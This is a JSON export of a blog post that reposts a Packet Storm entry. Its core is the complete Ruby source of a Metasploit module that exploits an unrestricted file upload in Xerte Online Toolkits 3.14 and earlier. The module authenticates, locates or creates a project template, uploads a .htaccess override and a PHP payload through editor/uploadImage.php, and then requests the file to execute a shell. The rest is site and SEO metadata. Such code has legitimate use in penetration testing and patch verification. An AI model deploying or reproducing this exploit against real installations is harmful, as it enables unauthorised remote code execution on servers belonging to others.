{"id":40781,"date":"2026-02-13T12:58:24","date_gmt":"2026-02-13T12:58:24","guid":{"rendered":"http:\/\/localhost\/?p=40781"},"modified":"2026-02-13T12:58:24","modified_gmt":"2026-02-13T12:58:24","slug":"xerte-online-toolkits-314-upload-image-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40781","title":{"rendered":"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:02:01&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits the user template file import functions unrestricted file upload in Xerte Online Toolkits versions 3.14 and earlier to upload and execute a shell. This targets editor\/uploadImage.php. This has only been tested in&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215589&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n      include Msf::Exploit::Remote::HttpClient\\n      include Msf::Exploit::FileDropper\\n      prepend Msf::Exploit::Remote::AutoCheck\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Xerte Online Toolkits Arbitrary File Upload &#8211; Upload Image&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module exploits the user template file import function&#8217;s unrestricted\\n              file upload in versions 3.14 and earlier to upload and execute a shell.\\n              This targets editor\/uploadImage.php.\\n              This has only been tested in implementations where the authentication type is \\&#8221;Db\\&#8221;.\\n    \\n              OPSEC\\n              &#8211; if the user is logged in elsewhere, they may experience interruptions\\n              &#8211; several requests sent to the server and activity is logged\\n            },\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;Brandon Lester&#8217;\\n            ],\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;URL&#8217;, &#8216;https:\/\/blog.haicen.me\/posts\/xerte-online-toolkits\/&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/www.xerte.org.uk\/index.php\/en\/news\/blog\/80-news\/357-xerte-3-13-en-3-14-important-security-update-now-available&#8217;]\\n            ],\\n            &#8216;Privileged&#8217; =\\u003e false,\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;PHP&#8217;, {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;php&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_PHP\\n                }\\n              ]\\n            ],\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-08-04&#8217;,\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n              &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n              &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS]\\n            }\\n          )\\n        )\\n        register_options(\\n          [\\n            OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;The path of a xerte installation&#8217;, &#8216;\/xerteonlinetoolkits&#8217;]),\\n            OptString.new(&#8216;USERNAME&#8217;, [ true, &#8216;The username to authenticate as&#8217;, &#8216;admin&#8217; ]),\\n            OptString.new(&#8216;PASSWORD&#8217;, [ true, &#8216;The password for the specified username&#8217;, &#8216;admin&#8217; ])\\n          ]\\n        )\\n      end\\n    \\n      def login\\n        print_status(&#8216;Attempting to authenticate&#8230;&#8217;)\\n        res = send_request_cgi(\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;\/&#8217;),\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;vars_post&#8217; =\\u003e {\\n            &#8216;login&#8217; =\\u003e datastore[&#8216;USERNAME&#8217;],\\n            &#8216;password&#8217; =\\u003e datastore[&#8216;PASSWORD&#8217;]\\n          },\\n          &#8216;keep_cookies&#8217; =\\u003e true\\n        )\\n    \\n        unless (res\\u0026.code == 200 || (res\\u0026.code == 302 \\u0026\\u0026 res.headers[&#8216;Location&#8217;] == &#8216;management.php&#8217;)) \\u0026\\u0026 res.get_cookies.include?(&#8216;PHPSESSID&#8217;)\\n          fail_with(Failure::NoAccess, &#8216;Failed to authenticate with the target.&#8217;)\\n        end\\n        print_good(&#8216;Authentication successful.&#8217;)\\n      end\\n    \\n      def check\\n        print_status(&#8216;Performing check&#8217;)\\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;website_code&#8217;, &#8216;php&#8217;, &#8216;language&#8217;, &#8216;import_language.php&#8217;)\\n        })\\n        if res\\u0026.code == 200\\n          if res.body.include?(&#8216;No valid language definition found in the file!&#8217;)\\n            return Exploit::CheckCode::Vulnerable\\n          else\\n            return Exploit::CheckCode::Safe\\n          end\\n        end\\n        return Exploit::CheckCode::Safe\\n      end\\n    \\n      def trigger_payload\\n        print_good(\\&#8221;Triggering shell at #{@web_path}\\&#8221;)\\n        # using for loop with the range\\n        shell_uri = @web_path.gsub(\/.*#{target_uri.path}\/, &#8221;) # gsub(\/\\\\.*${target_uri.path()}\\\\\/, \\&#8221;\\&#8221;)\\n        send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, shell_uri, &#8216;media&#8217;, php_filename)\\n        })\\n      end\\n    \\n      def upload_payload(my_payload, filename)\\n        # construct the payload and upload\\n        mime = Rex::MIME::Message.new\\n        mime.add_part(my_payload, &#8216;image\/png&#8217;, nil,\\n                      %(form-data; name=\\&#8221;upload\\&#8221;; filename=#{filename}))\\n    \\n        # web path will contain the full address, like `http:\/\/127.0.0.1:8180\/xerteonlinetoolkits\/USER-FILES\/3-reguser-Nottingham\/` so trim it\\n        mime.add_part(@media_path.gsub(%r{media\/$}, &#8221;), nil, nil, &#8216;form-data; name=\\&#8221;uploadPath\\&#8221;&#8216;)\\n        mime.add_part(@web_path.gsub(%r{media\/$}, &#8221;), nil, nil, &#8216;form-data; name=\\&#8221;uploadURL\\&#8221;&#8216;)\\n    \\n        # mediapath should be something like `\/var\/www\/html\/xerteonlinetoolkits\/USER-FILES\/3-reguser-Nottingham\/`\\n        register_file_for_cleanup(\\&#8221;#{@media_path}#{php_filename}\\&#8221;)\\n        register_file_for_cleanup(\\&#8221;#{@media_path}.htaccess\\&#8221;)\\n    \\n        res = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;\/editor\/uploadImage.php&#8217;),\\n          &#8216;headers&#8217; =\\u003e { &#8216;Content-Type&#8217; =\\u003e \\&#8221;multipart\/form-data; boundary=#{mime.bound}\\&#8221; },\\n          &#8216;data&#8217; =\\u003e mime.to_s\\n        )\\n        if res \\u0026\\u0026 res.code.to_i == 200 \\u0026\\u0026 res.body.include?(&#8216;Something went wrong while trying to uplod file!&#8217;)\\n          fail_with(Failure::UnexpectedReply, &#8216;payload was not uploaded.&#8217;)\\n        end\\n      end\\n    \\n      def delete_lockfile(template_id)\\n        # The previous step made a get request to the template, effectively locking it.\\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;edithtml.php&#8217;),\\n          &#8216;vars_get&#8217; =\\u003e {\\n            &#8216;template_id&#8217; =\\u003e template_id.to_s\\n          },\\n          &#8216;vars_post&#8217; =\\u003e {\\n            &#8216;lockfile_clear&#8217; =\\u003e &#8216;delete_lockfile&#8217;\\n          }\\n    \\n        })\\n        html = res.get_html_document\\n        vprint_status(\\&#8221;Deleted lockfile for #{template_id}\\&#8221;)\\n        variable_block = html.at(&#8216;[text()*=\\&#8221;mediavariable=\\&#8221;]&#8217;).text\\n        parse_template(variable_block)\\n      end\\n    \\n      def parse_template(template)\\n        # extract important variables from the template\\n        vprint_status(&#8216;Parsing template&#8217;)\\n        template.each_line do |line|\\n          if line \\u0026\\u0026 line.include?(&#8216;mediavariable=&#8217;)\\n            @media_path = line.split(&#8216;\\&#8221;&#8216;)[1]\\n          elsif line \\u0026\\u0026 line.include?(&#8216;rlourlvariable&#8217;)\\n            @web_path = line.split(&#8216;\\&#8221;&#8216;)[1]\\n          elsif line \\u0026\\u0026 line.include?(&#8216;template_id&#8217;)\\n            @template_id = line.split(&#8216;\\&#8221;&#8216;)[1]\\n          elsif line \\u0026\\u0026 line.include?(&#8216;path = \\&#8221;&#8216;)\\n            line = line.strip\\n            @template_path = line.split(&#8216;\\&#8221;&#8216;)[1]\\n          end\\n        end\\n        vprint_status(\\&#8221;Found media: #{@media_path}\\&#8221;) unless @media_path.blank?\\n        vprint_status(\\&#8221;Found web path: #{@web_path}\\&#8221;) unless @web_path.blank?\\n        vprint_status(\\&#8221;Found template: #{@template_id}\\&#8221;) unless @template_id.blank?\\n      end\\n    \\n      def find_valid_template\\n        # Iterates template ID&#8217;s 1-20 to see if any exist and if the user has access.\\n        found_template = false\\n        for template_id in 1..20 do\\n          vprint_line(\\&#8221;Checking template ID #{template_id}\\&#8221;)\\n          res = send_request_cgi({ # this causes the template to become locked\\n            &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n            &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;\/edithtml.php&#8217;),\\n            &#8216;vars_get&#8217; =\\u003e {\\n              &#8216;template_id&#8217; =\\u003e template_id.to_s\\n            }\\n          })\\n          if res\\u0026.code == 200\\n            if res.body.to_s.include?(&#8216;This project is currently locked as it is already being edited by you!&#8217;)\\n              delete_lockfile(template_id)\\n              found_template = true\\n              print_status(\\&#8221;Found mediavariable at #{template_id}\\&#8221;)\\n              break\\n            elsif res.body.to_s.include?(&#8216;Invalid template_id (could not find in DB)&#8217;)\\n              vprint_line(\\&#8221;Template #{template_id} doesn&#8217;t exist\\&#8221;)\\n            elsif res.body.to_s.include?(&#8216;Permission denied&#8217;)\\n              vprint_line(\\&#8221;Template #{template_id} belongs to someone else\\&#8221;)\\n            else\\n              vprint_line(\\&#8221;Template ID #{template_id} is not locked\\&#8221;)\\n              delete_lockfile(template_id)\\n              found_template = true\\n              print_status(\\&#8221;Found mediavariable at #{template_id}\\&#8221;)\\n              break\\n            end\\n          else\\n            print_bad(\\&#8221;Error with template #{template_id}\\&#8221;)\\n          end\\n        end\\n    \\n        unless found_template\\n          # If no projects are found, create one\\n          res = send_request_cgi({\\n            &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n            &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;website_code&#8217;, &#8216;php&#8217;, &#8216;templates&#8217;, &#8216;new_template.php&#8217;),\\n            &#8216;vars_post&#8217; =\\u003e {\\n              &#8216;tutorialid&#8217; =\\u003e &#8216;Nottingham&#8217;,\\n              &#8216;templatename&#8217; =\\u003e &#8216;Nottingham&#8217;,\\n              &#8216;tutorialname&#8217; =\\u003e Rex::Text.rand_text_alpha(8),\\n              &#8216;folder_id&#8217; =\\u003e &#8221;\\n            }\\n          })\\n    \\n          if res\\u0026.code == 200 \\u0026\\u0026 !res.body.to_s.include?(&#8216;FAILED-Failed to create new template record&#8217;)\\n            # Ensure the project was created\\n            template_id = res.body.to_s.split(&#8216;,&#8217;)[0]\\n            print_status(\\&#8221;Created template (id: #{template_id})\\&#8221;)\\n            delete_lockfile(template_id)\\n            found_template = true\\n          end\\n        end\\n        # If for some reason, the previous project creation failed, it&#8217;s probably best to create one manually.\\n        fail_with(Failure::NotFound, &#8216;User has no project templates, try logging in and creating one. Also, check whether more than 20 projects are already created.&#8217;) unless found_template\\n      end\\n    \\n      def exploit\\n        login\\n        find_valid_template\\n        # this exploit won&#8217;t work unless a .htaccess file is also uploaded\\n        upload_payload(htaccess_payload, &#8216;.htaccess&#8217;)\\n        upload_payload(payload.encoded, php_filename)\\n        print_status(&#8216;Uploaded the PHP Payload file&#8217;)\\n        trigger_payload\\n      end\\n    \\n      def php_filename\\n        @php_filename ||= Rex::Text.rand_text_alpha(8) + &#8216;.php&#8217;\\n      end\\n    \\n      def htaccess_payload\\n        \\u003c\\u003c~PAYLOAD\\n          \\u003cIfModule mod_rewrite.c\\u003e\\n              RewriteEngine Off\\n          \\u003c\/IfModule\\u003e\\n        PAYLOAD\\n      end\\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215589&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215589\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:02:01&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits the user template file import functions unrestricted file upload in Xerte Online Toolkits versions 3.14 and earlier to upload and execute&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-40781","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40781\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:02:01&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits the user template file import functions unrestricted file upload in Xerte Online Toolkits versions 3.14 and earlier to upload and execute...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40781\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-13T12:58:24+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40781#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40781\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589\",\"datePublished\":\"2026-02-13T12:58:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40781\"},\"wordCount\":1577,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40781#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40781\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40781\",\"name\":\"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-13T12:58:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40781#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40781\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40781#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40781","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-13T18:02:01&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits the user template file import functions unrestricted file upload in Xerte Online Toolkits versions 3.14 and earlier to upload and execute...","og_url":"https:\/\/zero.redgem.net\/?p=40781","og_site_name":"zero redgem","article_published_time":"2026-02-13T12:58:24+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40781#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40781"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589","datePublished":"2026-02-13T12:58:24+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40781"},"wordCount":1577,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40781#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40781","url":"https:\/\/zero.redgem.net\/?p=40781","name":"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-13T12:58:24+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40781#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40781"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40781#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Xerte Online Toolkits 3.14 Upload Image Shell Upload_PACKETSTORM:215589"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40781","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40781"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40781\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40781"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40781"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40781"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}